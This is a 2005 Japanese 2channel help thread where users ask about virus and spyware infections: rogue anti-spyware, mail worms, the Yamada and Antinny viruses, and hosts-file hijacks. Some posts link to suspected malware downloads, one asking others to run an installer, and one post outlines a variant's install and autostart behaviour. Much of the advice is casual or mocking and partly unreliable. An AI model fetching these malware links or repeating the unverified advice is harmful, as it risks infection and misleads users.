ちょっと製品検索したら、４段階ぐらい飛ばされて、
見たこともないような漢字のページになって、
しかもウイルスの警告がでまくってます。
そしたら、キーボードの入力をうけつけなくなりました。

トホホ。パスワードわかんないから挙げなおしたら使えない・・・・
どうしたらいい？もう終電ないし・・・

>>641
どうやって書いてんだYo
携帯？

>>642
部長席の端末上げてます。
パスワード知ってるので（ｗ
ただ、これで開発すると、
ログに残っちゃうんで
ダメなんですよ。

>>643
焦るもの解るが>>1くらい見たら？
きちんと書けば誰か親切な香具師が現れるかも。

>>644
もう仕方ないおで電話で聞きました。

SPYWARENO!っていうアンチスパイウェアソフトを装った奴知ってます？

知人が感染したＰＣを見に行ったんだけど、デスクトップにWINDOWS ERRORとでっかく表示されて
アイコンをクリックすることも出来ず・・
ソフトとエクスプローラ強制終了と再起動で多少マシになるんだけど
再起動後に毎回ネットから体験版？をダウンロードしてインスコしてレジストリもご丁寧に元通り・・

で、毎回スパイウェアが入ってるよと警告してきて、レジストを迫ってくる　金払ってレジストしても直らないとは思うが・・
２時間いろいろ修復しまくったけど、どうしても直らずあきらめて再インスコしました・・

今調べたら、結構海外で被害者がいるみたい
ソフトメーカーのどう考えてもマッチポンプなんだけど、トボけてるっぽい
ttp://netrn.net/spywareblog/archives/2005/05/22/new-rogue-anti-spyware-spypareno/

ここに出てる
ttp://vxiframe.biz/adverts/progs/winlogon.exe
がスパイウェアのインストーラーかも
漏れは諦めたので、誰か実験してホスィ


日本語サイトだと、ググっても１件？しかヒットしなかった
ttp://kosuge.kdn.jp/anti/bbs/bbs.cgi?mode=allread&pastlog=0028&no=1293&page=10&act=past

>>646

>>507-508
↓
>>510

このパターンが多い。
ちなみにＨＤＤを暗号化して、それを人質に料金を要求するのもこのてのもの。

>>646
その手の話はこっちでした方がいいんじゃね？
【総合】スパイウェア予防駆除 Part7
http://pc8.2ch.net/test/read.cgi/sec/1111917202/

W32.Netsky.P@mm が前から届いてて
メルアド変えてとりあえずアドレスに登録してた人に
通知しました
しかし新しいPCでメール設定しても
また届きます
これは自分が感染してるわけではなく
通知した人の誰かがかかってるってことですかね？

>>649
普通に考えれば、その可能性が一番高いな。

OZmall閉鎖。
http://www.ozmall.co.jp/

つーかメアド変える意味がわからん

当方、トレンドマイクロのinternet securityを使っていますが、

BIOSリセット後にパターンファイルをUPしたみたいで、last updateが2004/1/1になってしまいました。
XPのウィルス対策が最新の状態ではありませんとでて非常に宇材です。

サーバに新しいのがあがれば解決すると思いますが。。

>>653
貴様が何を言っているのかわかりません
トレンドマイクロにはinternet securityなんてソフトはありません
何を求めてるのかがわかりません
日本語を勉強しなおして出直してこいです

>>654
日本語言ってんだろ低脳。お前が日本語勉強しなおしてこいよ。

>>655
まず、トレンドマイクロのinternet securityなんて存在しないわけだが

>>656
俺に言われても困るんだが

>>657
お前は理解できたんだろ？

http://rerere.servebeer.com/src/up8842.png
ちょ、ま。

http://rerere.servebeer.com/src/up8843.png
こっちだた。

英語版かねぇ・・・
Trend Micro PC-cillin Internet Security 
ttp://www.trendmicro.com/en/products/us/personal.htm

>>653
再インスコすれば？

【使用OS】 WinXP
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】 ノートン先生
【ちゃんとUpdateしてるか】 してます
【スキャンした結果（ウイルス名・発見場所）】
脅威警告でTrojan Houseというのが検出されましたが、削除できませんでしたという報告が出て、
スキャンしましたが検出できませんでした。セーフモードでスキャンしなおそうとすると、なぜかノートンのエラーが出て立ち上がりませんorz
【別のオンラインスキャンしたならその結果は】 今やってます
【症状を具体的に、分かる限りすべて書く】 自分ではまだ変わったことには気づけてません。
【何をしたらそんなことになったのか】あるスレを覗いたところ、引っかかりました。
【これまでにとった措置】
初めてのことなので、とりあえずノートン先生の言うとおりに復元機能切って
うｐｄａｔｅ最新にしてセーフモードでスキャンしようとまではしました。
が、ノートン先生立ち上がらず。
Torojan Houseというウィルス情報も先生の説明が日本語でないのでわかりません…
【その他の質問】 トロイの木馬系というのは、よくわからないんですが、見つからないそうなんで自分で削除すればそれで大丈夫なんでしょうか。アドバイスよろしくお願いします。

すいません教えてほしいのですがブラクラふんでしまい
ウイルスアラートがでてしまったのですがひとつウイルスが削除できません
でしたみたいなのがでたんですがどうしたらいいでしょうか？
トレンドでオンラインスキャンしたらHTML_REDIR.Aというウイルスでした
ウイルス対策ソフトはVirus scanの最新版をつかっても
アラートに反応しませんでした
パソコン初心者なのでどうしたらいいかわからません
ウインドウズXPですああぁ〜どうしよう・・・・
誰か教えてください・・・・
めちゃくちゃ不安なんです

とりあえずテンプレにならった形で質問してね。
そうしないと困っちゃう。

ノートンインターネットセキュリティで『ウイルスが検出しました』って出てきて『ファイルを修復できません』って出てきたんですけどどうしたらいいですか?

【使用OS】 windowsXP
【WindowsUpdateしてるか】ウイルスのupデートのことですか？
【AntiVirusは何を使っているか】マカフィーのVirus scan７．１
【ちゃんとUpdateしてるか】 やってみましたが最新版になってました
【スキャンした結果（ウイルス名・発見場所）】もう一度マカフィーでしたら発見されませんでした
【別のオンラインスキャンしたならその結果は】 【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】 HTML_REDIR.A
【別のオンラインスキャンしたならその結果は】 なんか削除できませんみたいな表示がでました
【症状を具体的に、分かる限りすべて書く】今のところ何もおきてませんが・・
【何をしたらそんなことになったのか】２ちゃんのブラクラをふんでしまいました
【これまでにとった措置】 何もしてません・・・
【その他の質問】 どうしたら削除えきますか？
リカバリーしなくてちゃいけませんか？


【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

>>667
＞【WindowsUpdateしてるか】ウイルスのupデートのことですか？

ウインドウズのアップデートです

http://dayoore.hp.infoseek.co.jp/cgi-bin/imgboard.cgi?bbsaction=disp_rep_form&amode=&page=1&blood=20050528170536&parent=1403
お返事くださいね

>>667
削除してくれるオンラインスキャンなんてあるか　ボケ

>>667
【AntiVirusは何を使っているか】マカフィーのVirus scan７．１

>>667
見てるのか？
それはセキュリティホールをついてくるタイプで俗に言うダウンローダーってやつか
それ単体での破壊活動はない
ダウンロード先のサイトは氏んでるので現時点でそのウイルス（？）の脅威は無い
つーかウインドウズのアップデートをしる

バカが5匹もつれた

>>669
いいねえ

タスクマネージャーにNEC.EXEとあるが大丈夫かな

パソコン初心者でよく分からないのですが、フリーのAVGのダウンロードは
どのようにすれば出来るのか教えてください。またはやり方などが書かれた
サイトを教えて下さい。お願いします。

>>676
なぜ2chの中からここを探し出せる能力を持ちながらそれを使おうとしない？
googleで「AVGのダウンロード」で検索しろ。一発だ。

つーかAVGのダウンロードの仕方は
AVGのホムペに書いてある

つーかそんなことも自分でできない初心者がフリーなんか使うな

>>676
ttp://free.grisoft.com/doc/Get+AVG+FREE/lng/us/tpl/v5
ここのavg70free_322a531.exｅをDLすれば委員だと思うよ。

本日友人が日本テレビの西尾アナウンサーのファンサイトを見ていて
ウィルスに感染しました。
ウィルス名？はspywareno! というみたいです。
ピーっと音がしてウィンドウズが使えなくなったみたいなのですが
これはどう対処したらよいのでしょうか？

これってウイルス？もしくは、壊れたexe？
ノートン、バスターでスキャンしたけど何も反応なしでした。（謎）
教えてエロイ人！！

ttp://kasamatusan.sakura.ne.jp/cgi-bin2/src/matu2980.exe.html

あっ、アイコンがXPの標準フォルダーと同じになってるので、
間違ってクリックしないように、お気をつけ下さい。

>アイコンがXPの標準フォルダーと同じになってる

なんか、それだけでメチャメチャ怪しいのだが。
何をしようとしてDLして、んでどうなったん？

>>684
ですよね。。
知り合い（といっても遠い）人から色んなファイルと共に送られてきたんですけど、
すごく怪しいかおりがしたのでちょっと聞いてみたくて。

ぽっちっとやってしまったら、「無効なEXEです」って出て、
今のところは何も問題ないのですが。。。

中途半端な知識でメモ帳で開いたり色々したのですが、
よくわからず、聞いてみた所存です。
詳細わかりますでしょうか？泣

山田の亜種とかじゃないのか？

>>686
一応オリジナルのタイムスタンプが2週間以上前なので、
亜種でももう対応しててもおかしくないかなぁっと思っているのですが・・・。

プログラムとか詳しい方がいれば何かわかるかなっと思いまして。
お騒がせして申し訳ないです。

>>687
亜種多過ぎて、メーカー対応できてないはず＞山田
クリックしてしまったなら、一応、山田に感染してないかチェックしといた方がいいんじゃない？

使用OS＝WIN MX
アップデート＝している
アンチウィルス＝入っている
スキャンした結果＝していない
これまでに取った措置＝一時ファイルの削除
これにて一件落着

eTrustとSybariが"Win32/DelWin.L!Trojan"と判定しているほかは無反応
アヤしい…

>>688
一応山田チェッカーはやってみました。
問題はなかったです。

でも、山田って再起動してからでないと活動しないですよね？（←違いましたっけ？）
まだぽっちっとしてから、再起動は怖くてやってないんです。
山田なら、駆除できるそうなのでなんとかなると思いますが、
ドライブフォーマットとかだとしゃれにならないので・・・。

プログラムの知識がない自分が情けない・・・。(ﾉД`)

>>690
それって、私がうｐしたやつのことでしょうか！？
でしたら駆除方法等教えて頂きたいです。

>>692
要はここで調べただけなんだが
ttp://www.virustotal.com/flash/index_en.html

>>693
こんなページあるんですね。参考になりました。
これからどうしよう。。

DelWin.L!TrojanってやっぱりWindowsあぼーん系ってことかな。
こまった。。誰か助けて。。(ﾉД`)

しろうとですいません。
ttp://dayoore.hp.infoseek.co.jp/
このｻｲﾄが現在荒らされてる見たいなんですけど、このページから「飛ぶ！」
を選んで掲示板に行くのですが、それだけでｳｲﾙｽに感染するみたいなんです。
で、感染してしまったわけなんですが、どうしたら良いのか分らないので来ました。
自分でわかる事を書きます。

自分のＰＣはウインドウズ９８です。
ＰＣに最初から入ってた対策ソフトは更新してません。
症状は、１スタートページを替えられて元に戻せ無い事。２デスクトップに最初はSpayware
Avenger　とかいうショートカットが出来てたのでゴミ箱で削除した所、Virus Hunter
Security とか言うショートカットができてました・・

>>695
それはスパイウェアっぽいんだが

>>696
どうしたらいいのですか？

>>697
スパイウェア駆除ソフト入れる

【総合】スパイウェア予防駆除 Part7
http://pc8.2ch.net/test/read.cgi/sec/1111917202/
の11-15辺りを読め

ありがとうございます。

誰かお助けください…。
数日前からウイルス入りの素敵メールが
1日に何通も来るようになりまして…。
1度感染してしまった分については、間違いなく
駆除したのですが・・・。
この手のメールが来なくなるにはどうしたらよいでしょう？
因みに、ノートンアニバーサリー2005使用
ウイルス定義は常に更新、システム完全スキャンは
毎週やっているので、とりあえず問題ないとは思うのですが、
何せ素人なもので自信ないです。
送られてくるウィルスはＷ32Mytob.AJ@mmとか
最初にＷ32ってつくワームが色々と…。

>>700
メアド変えるか、
スパムとして、はじけばいいんじゃない？

>>701様
え？メアド変えたら来なくなるんすか？
っていうか何が原因なんでしょう？
今後の参考になるので、ご教授いただけると・・・
非常にありがたいのですが^^；

>>702
ウィルスメールが来るのは、君が感染したから、来るわけじゃないよ
ウィルスにもよるけど、メールで感染するタイプなら、
君のアドレス知ってる誰かが感染して、無作為に送ってきてるんだろうから、
君のアドレス変えれば来なくなる。
他の対策だと、有料だけどプロバなんかのウィルスメールチェックでもウィルスメールは
はじいてくれる。

他にも
ttp://homepage1.nifty.com/eimei/
のSpam Mail Killerなんかのスパム対策ソフトで添付ファイル指定できる奴で弾くとか

【使用OS】 windows XPpro SP2
【WindowsUpdateしてるか】自動更新しています。
【AntiVirusは何を使っているか】 ノートンアンチウイルス2003
【ちゃんとUpdateしてるか】 自動更新しています。ウイルス定義ファイル2005/5/27
【スキャンした結果（ウイルス名・発見場所）】 C:\WINDOWS\system32\cssrs.exe　PWSteal.Trojan
【別のオンラインスキャンしたならその結果は】 していません。
【症状を具体的に、分かる限りすべて書く】 PC起動後、cssrs.exeが外部に接続しようとします。ノートンインターネットセキュリティーで通信を止めて、cssrs.exeのプロセス停止後にノートンで削除しています。cssrs.exeを削除しても再起動後には復活します。
【何をしたらそんなことになったのか】 海外サイトでフラッシュを見ていた時にブラクラを踏みました。
【これまでにとった措置】
ttp://www.symantec.com/region/jp/sarcj/data/p/pwsteal.trojan.html
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FAGOBOT%2EFX&VSect=T
シマンテック、マイクロトレンド等に掲載されていた対処法をしてみました。
しかし、載っている対処法ではレジストリに該当するエントリが無く、
レジストリのどの部分に書き込まれているのか、散々探してみたものの、自力では探しきれませんでした。

対処法の分かる方、アドバイスお願いします。

>>705
システムの復元を無効にするとかじゃないの？

>>706
システムの復元は無効にしています。

>>705
起動時に実行される圧縮されていてソフトでは発見出来ないファイルになっている親玉インストーラーが悪さをしています

>>708
mscpnfigでスタートアップを向こうにすれば防げるのかね。

>>709
それじゃ無理

山田ウィルス情報
http://127.0.0.1/
現在出回っている亜種にはこれをやっても無駄なのも出ていますので
安心したいなら山田チェッカーを落として確認したほうがいいよ
ニュイルス日誌 （山田チェックツールあり）
ttp://blog.livedoor.jp/antiny_virus
山田チェックツールの使用方法は
×××××××（´・ω・）ｶﾜｲｿｽ 山田ヲチスレ 9×のテンプレに
あるので読んでください

まとめサイト
ttp://www2.atwiki.jp/kawaisosu/
山田ウィルスまた亜種が進化したらしい

名前：通報屋 ◆Y39/vakKjY [sage] 投稿日：2005/05/29(日) 23:12:43 ID:CZf5CLP+0
実機試験してきた。バージョンはMellpon/07（おそらく）
適当に中を覗いてみた結果：
ﾃｷｽﾄ=ASCII "リソースを覗くなと。。。リソースを弄るなと。。。文字列を覗くなと。。。文字列を弄るなと。。。
（´・ω・） ｶﾜｲｿｽ（´・ω・） ｶﾜｲｿｽ（ｒｙ

後ろから突いちゃ（´・ω・） ｶﾜｲｿｽ
実機試験したらこうなりました：
・EXEを実行すると、内部に持ってるJPGを解凍
・自分自身を削除
・%Program Files%の中のランダムなフォルダに寄生
・HKEY_LOCAL_USERにlMJPMlGというエントリで自動起動を設定
・C.html C.zip等を作る

これくらい。
おそらくmellpon/07だから最新版08ある場合にはキボンヌ

今日ビックカメラに行ったら、
livedoor の PandaSoftware TruPrevent というソフトの
チラシをもらったんだけど、知ってる人いる？

・未知のウイルス(定義ファイルがない)にも対応している
・Norton や マカフィーなどと併用し、これらが取りこぼしたウイルスを
　このソフトがブロックする

というふれこみだそうです。

http://soft.livedoor.com/panda/

>>712
>>270にも登場してるPanda Softwareのアンチウイルス製品で
ライブドアが日本販売代理権を取得しただけ。

【使用OS】 windowsXP
【WindowsUpdateしてるか】最近はしていません
【AntiVirusは何を使っているか】ノートンAntiVirus2003
【ちゃんとUpdateしてるか】 している
【スキャンした結果（ウイルス名・発見場所）】 Unix.Penguin
(別名: ~UNIX/Jaded, SH/Penguin.A, Linux/Penguin)　種別: トロイの木馬
【別のオンラインスキャンしたならその結果は】 していません
【症状を具体的に、分かる限りすべて書く】 Unix.Penguin は、Unix上で動作する単純かつ悪質なシェル スクリプト プログラムです。
Norton AntiVirusのUnix.Penguin検出技術は、システム パスワード データ ファイルを
外部に送信しようとするUnix シェル スクリプトをすべて検出します。
【何をしたらそんなことになったのか】わからないですね・・・。
一日に物凄い量のメールが来るときがありますが･･･。一応ノートンは削除したって言ってくれるんですけどね･･｡
【これまでにとった措置】 今のところ何もしてません
【その他の質問】 対処方法はあるんでしょうか？
「不審なシェル スクリプト(自分で書いた記憶がないシェル スクリプトなど)
が存在する場合､そのスクリプトを削除するか､
あるいは､Unixの管理者に報告してください。」と書いてあったんですが
意味が全然解らないです･･･｡どなたか解る方いらっしゃいませんでしょうか？

>>714
誤検出なので気にしない。

>>715
本当ですか？それなら気が楽になりますが･･･｡
というか誤検出って頻繁にあるものなんでしょうか？

>>716
一概に「誤検出」とも言い切れんところではあると思う。
ただ、Windows系ならUnix系の不正コードが検出されたところで影響する可能性は非常に低いのは確かだけどな。

>>716

　　　　　　_______　　　　　　　　　　　　　　　　　　　　　_＿
　　　　／／￣~`i ゝ　　　　　　　　　　　　　　　 　 　 `l |
　　　 / /　　　　　　　 ,______　　　,_____　　　　________　 | |　　____　TM
　　　|　|　　 　 ＿__　//￣ヽヽ　//￣ヽヽ　（（￣）） 　 | |　//￣_>>
　　　＼ヽ、　　 ｜l　| |　 　 | |　| |　 　 | |　　``( (.　　.| |　| | ~~
　　　 　 `、二===-'　 ` ===' '　　`===' '　 //￣ヽヽ 　|__ゝ ヽ二=''
　　　　　　　　　　　　　　　　　　　　　　 　 ヽヽ___//　　　日本
　　＿＿＿＿＿　＿＿＿＿＿　 ＿＿＿＿＿_ 　＿_＿＿＿＿＿
　　|　 ウェブ 　|　|　イメージ　|　|　グループ　|　|　ディレクトリ　|
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　 .＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　　｜ノートントラップ　 　　　　　　　　　　　 　 │・検索オプション
　　　　　　└────────────────┘・表示設定
　　　　　　　 　| Google検索　|　I'm Feeling Lucky　| 　・言語ツール
　　　　　　　　 ￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　○ウェブ全体から検索 ◎日本語のページを検索
　
　
　
　広告掲載について - 人材募集 - Googleについて - Google in English
　￣￣￣￣￣￣￣￣　 ￣￣￣￣　￣￣￣￣￣￣￣　￣￣￣￣￣￣￣
　　　　　　c2004 Google - 4,285,199,774ウェブページから検索

ヽ(`Д´)ﾉｳﾜｧｧﾝ

4WDウィルスとはどういうのですか？
感染してるか見つける方法
駆除方法教えてください

>>720
http://www.google.co.jp/

※緊急※

第二の価格コム事件とも言える「ozmall」のサーバがクラックされた事件の場合では、
現時点でマカフィーとアンラボ製品が問題のウイルスを検出できてます。
ttp://www.ozmall.co.jp/050530/virus.html#soft
　　　　　　　　　　　　　　　　　　　　　　　検出　駆除
マカフィー（Managed VirusScan）　　　　可　　　可
アンラボ（V3ウイルスブロック2005）　　可　　　可
NOD32　　　　　　　　　　　　　　　　　　　不能　不能

【ドモコ】 winnyキンタマウイルス感染 【ﾃﾗﾔﾊﾞｽ】 　
http://news19.2ch.net/test/read.cgi/news/1117609611/
ＮＴＴドコモ東海が静岡、愛知、岐阜県内に設置した携帯電話基地局
約８００カ所の所在地や入局方法などをまとめた「社外秘」扱いの資料が、
ネット上に流出していることが分かった。事態を重視した同社はすべての
鍵を付け替えるなど緊急対策を実施した。ファイル交換ソフト「ウィニー」の
ウイルス感染が原因とみられる。

age

うう〜、検索してたら知らないうちに、hostファイル書き換えられていた。
どこのサイトだ。一体・・・保護にはどのようなソフトがいいのだろう（;´Д｀）

O1 - Hosts: 64.91.255.87 www.dcsresearch.com

>>725
一番簡単なのはhostsファイルのプロパティで「読み取り専用」属性にチェックしとくこと。

>>682
そのファイルはKasperskyによってめでたく「Trojan.Win32.KillWin.aj」と認定されました

Osama Bin Ladenが捕まった時のスライドショーですみたいな本文つきで、
zipで圧縮されたpics.scrが、今朝から届きだしたのですが、これって新種？

バスタは無反応です。

これみたいです。
http://www.mcafeesecurity.com/japan/security/virD.asp?v=Downloader-ABL

バスタ、未だ無反応

http://download.msgplus.net/files/MsgPlus-354.exe
↑のサイトで
ＭＳＮメッセでプラスをＤＬ中に
アドウェアっていうのに協力すると感染するウィルスの対策方法を教えてください

ｍ（_　_）ｍ

ＯＳ：WIN
対策：とってないです

人ずてで、聞いた話なので詳細わからなくてすみません…

祭り中。かなりデカくなる予感。（イッチー以上）

【患者晒し】証拠隠滅中の放尿カルパッチョ　11�g【放射能洩らし】
http://news19.2ch.net/test/read.cgi/news/1117781688/

・オペ後の患者写真、遺体解剖写真をHPに無断掲載
・放射性物質トリチウムを川へ垂れ流し　　※近所の人は注意を
・飲酒運転告白
・各地の温泉で浴槽へ度重なる放尿

現在あわててＨＰの写真削除中！でももう遅い・・・・
ttp://www4.osk.3web.ne.jp/%7Eciaociao/top.htm

まとめ
ttp://www.geocities.jp/carupaccio2005/
ttp://wave.prohosting.com/~john1252/index.html

このスレで良いのか疑問ですが、どなたか教えてください。
【使用OS】
　　検出したパソコンはWinXP
【WindowsUpdateしてるか】
　　すべて。
【AntiVirusは何を使っているか】
　　ノートンアンチウイルス２００５
【ちゃんとUpdateしてるか】
　　している
【スキャンした結果（ウイルス名・発見場所）】
　　（後述）
【別のオンラインスキャンしたならその結果は】
　　（後述）

【症状を具体的に、分かる限りすべて書く】
　　会社の社内ＬＡＮにての問題、接続されているパソコンは５００台超。
　　当方のパソコンにインストールしてあるノートンアンチウイルス２００５の「ワームプロテクト」がワームを遮断したと言い出す。
　　（会社標準のウイルス検査ソフトがしょぼい為、自腹でインストール。）
　　具体的なログは下記の通り。
　　「ルールDefault Block Bia Trojan horse」がxxx.xxx.xxx.xx、1042を遮断しました。」
（注、上記のＩＰアドレス部分は伏せさせて頂きました。）
　　　現在、２カ所からぴったり同じ時刻に攻撃が来る。
　　　その２カ所はパソコンでなく、メルコ製ＮＡＳの「LinkStation」。
　　　メルコに問い合わせるも、「弊社のＮＡＳは独自ＯＳなのでウイルス等に絶対に感染しません」と、とりつく島無し。
　　　もともと１台だけだったのが先日２台目にも感染したようだ・・・。
【何をしたらそんなことになったのか】
　　　不明。
【これまでにとった措置】
　　　ＮＡＳに対するウイルス検査方法と駆除方法が判らず困っている。
　　　会社側は、「メルコが問題ないと言っているのだから、ノートンの誤検出」と無視。
【その他の質問】
　　　ＮＡＳ自身のＯＳはメルコが言うように、本当にウイルス等に感染しないのか？
　　　そして、そもそも本当にワームからの攻撃なんでしょうか？
LinkStationのＯＳがウイルスに感染しているかどうかの検査方法等を、ご教授ください。

>>730
C2lopとCoowWebSearch（？）らしいな
http://www.higaitaisaku.com/msnplus.html

アドウェアを入れるかインストール時に選択できるらしいよ。

abc

【使用OS】 Win89
【WindowsUpdateしてるか】 してない
【AntiVirusは何を使っているか】 セキュリティソフト？入れてない
【ちゃんとUpdateしてるか】 してない
【スキャンした結果（ウイルス名・発見場所）】
　　http://housecall.antivirus.com/housecall/start_jp.asp?i=n
【別のオンラインスキャンしたならその結果は】
　　開くと、現在のセキュリティ設定では、このページの ActiveX …
【症状を具体的に、分かる限りすべて書く】
　　ウイルスに侵入されないのに、黄色い服を着た人がソフトの販売を勧めてくる
【何をしたらそんなことになったのか】
　　セキュリティが脆弱になるOSやソフトのバージョンアップをしない
【これまでにとった措置】
　　セキュリティの設定を上げた
【その他の質問】
　　古いPCなので手がすべったりしなければウイルスに侵入されたりしませんよね？

>>736
セキュリティ高＝ActiveXが使えない＝ActiveXを使用したオンラインスキャンはできない
つか、Updateもセキュリティ対策もせずにウィルス感染しませんよね？て・・・
↓読んで勉強してから出直して来い。

ttp://eazyfox.homelinux.org/

【使用OS】 winXP
【WindowsUpdateしてるか】PC購入が3日前で2日前にしました
【AntiVirusは何を使っているか】 ノートン　Antivirus2005
【ちゃんとUpdateしてるか】 してません
【スキャンした結果（ウイルス名・発見場所）】bloodhoun Exploit.6　場所はわかりません
【別のオンラインスキャンしたならその結果は】してません
【症状を具体的に、分かる限りすべて書く】 他のページへの移動が遅かったり、読み込みが急激に不安定になりました
【何をしたらそんなことになったのか】 なんだったかな　いろんなURLに飛んでたのでその時かも
【これまでにとった措置】 色々調べましたが意味がわからないので何もしてません
【その他の質問　なし

2chは前からやってたのですが、PCのことについてはさっぱりなので言葉足らずで申し訳ないです

>>737
トップページはめんどくさいから読まない。
要点をまとめてここに書けば読んであげます。
｢これまでにとった措置｣に書いているように、
セキュリティ対策を何もしていないわけではなく、意図せずにウイルスに
感染するということありえない状態にしてあります。

>>737
どこからどう見てもネタ100%じゃねーか（笑）
そんなもんいちいち構うなよ

>737
馬鹿は放置したほうがいいよ

【使用OS】WinXP SP2
【WindowsUpdateしてるか】してます
【AntiVirusは何を使っているか】トレンドマイクロ　ウイルスバスター2005
【ちゃんとUpdateしてるか】毎日してます
【スキャンした結果（ウイルス名・発見場所）】現在は感染してません
【別のオンラインスキャンしたならその結果は】感染してませんでした
【症状を具体的に、分かる限りすべて書く】
過去にAntinny.A＆JやParite.Aなどにウイルス感染したことがあります。
改変されたレジストリを削除しようと思ってwin.iniで調べてみたのですが、
[ぬるぽ]
ぬるぽ=>>1 ｶﾞｯ Ｖ｀Д´）/
となっています。
通常なら感染しているファイルのパスが表示されるそうなのですが、
表示されていないためにレジストリを削除することができません。
これはウイルスを駆除できているということなのでしょうか？
【何をしたらそんなことになったのか】Winny
【これまでにとった措置】感染ファイル削除、ウイルススキャン、win.iniで確認
【その他の質問】
特定のスクリーンセーバーが設定しても無効化されてしまうということは
今もAntinnyに感染しているということなのでしょうか？
それとwin.iniの「ぬるぽ」を消す方法があれば教えてください。

よろしくお願いします。

>>742
>>1の２行目を穴が開くほど良く読んでみろ

>>743
読んだので先にスレを探しました。
でも専門スレが見つからなかったのでこちらに書かせてもらいました。

ＯＳ　ウインドウズ９８
今価格コム覗いたんですが
大丈夫でしょうか。
シマンテック　ノートンアンチウイルス２００４を使用しています。

>>744
ここでは満足いくレベルの回答は得られないと思うよ。
回答者も素人だし。
ぶっちゃけ、ny関連のウイルスって対応が判明していないのが多い。
アンチウイルス各社も後手後手の対応だしなぁ。

【使用OS】
XP home
【WindowsUpdateしてるか】
月1ぐらいで
【AntiVirusは何を使っているか】
使っていません
【別のオンラインスキャンしたならその結果は】
スキャン中に何故か止まってしまいます。。
【症状を具体的に、分かる限りすべて書く】
USB接続のmp3プレイヤーを使っているのですが
ファイルを転送したあとmp3プレイヤーの中に
付録.txt　　　　　exeというファイルがコピーされています
【何をしたらそんなことになったのか】
直接の原因かは分かりませんがMP3CopyUtilというフリーソフトと
NET FrameWork1.1をインストールした後からこうなりました
ファイルをスキャンすべきだったのですが
気持ち悪くてすぐ削除してしまいました。すいません

２ちゃんから別のサイトにジャンプしたら
（新シャア板　さすが○○は××のお家芸だなで1000を目指すスレ
の５３番のレスです・・）

トロイの木馬に感染した旨のメッセージが出ました
マカフィーセキュリテイースイーツを
使っていたので削除し、ウイルススキャンしても
異常はありませんでした

その後ｇｏｏなどで、オンラインウイルスチエックがあると聞き
ウイルスバスターとｓｙｍａｔｅｃｋの２社のを利用したところ

ウイルスバスターではＨＴＭＬ＿ＲＥＤＩＲ．Ａに感染
ｓｙｍａｔｅｃｋではＵｎｉｘ．Ｐｅｎｇｕｉｎに感染
との診断が・・・

後者は２ちゃん利用の誤検出かもしれませんが
前者のほうが気になります
どなたか削除の方法や対処法などご存知の方教えてください

>>748
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_REDIR.A

>>749恐れ入ります
マカフィーではスキャンできず

トレンドマイクロ社とは契約していないので
削除ソフトは使えないのですが

こういう場合はどうしたらいいですか

>>742
win.iniをメモ帳で開いて該当行をDeleteして上書き保存すればいいんじゃね？

つか、ここでも眺めとけ（質問禁止）
Winnyを狙ったワーム・ニュイルス情報 Part39
http://tmp5.2ch.net/test/read.cgi/download/1115476484/l50